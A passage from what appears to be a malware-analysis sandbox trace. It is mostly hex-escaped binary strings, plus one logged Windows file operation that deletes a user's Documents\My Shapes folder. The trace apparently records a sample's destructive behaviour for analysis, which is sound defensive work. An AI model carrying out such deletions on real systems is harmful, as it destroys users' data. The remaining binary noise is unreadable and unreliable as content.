x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1bfc\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x7a94\x5380\xf64c\x7ceb\xa45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae") | out: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5